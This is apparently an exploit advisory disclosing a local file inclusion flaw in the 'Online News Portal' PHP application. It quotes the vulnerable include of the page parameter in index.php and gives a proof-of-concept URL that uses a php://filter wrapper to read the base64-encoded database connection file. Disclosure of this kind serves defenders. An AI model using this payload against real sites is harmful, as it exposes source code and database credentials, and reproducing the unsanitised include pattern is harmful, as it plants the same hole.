Online News Portal versions released prior to November 16, 2020 have been identified as being susceptible to a local file inclusion vulnerability.
# Exploit Title: Online News Portal - Local File Inclusion
# Date: 2020-11-16
# Exploit Author: gh1mau
# Email: [email protected]
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14600&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code
# Software Release Data: November 16, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
Vulnerable File:
----------------
/index.php
Vulnerable Code:
-----------------
Entry point:
line 26: $page = isset($_GET['page']) ? $_GET['page'] : 'home';
Exit point:
line 27: include $page.'.php';
Vulnerable Issue:
-----------------
Attacker could load and read any file from the application (page= parameter from index.php) (with .php extension) and decode the base64 response to read the source code.
POC:
----
http://localhost/news_portal/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect
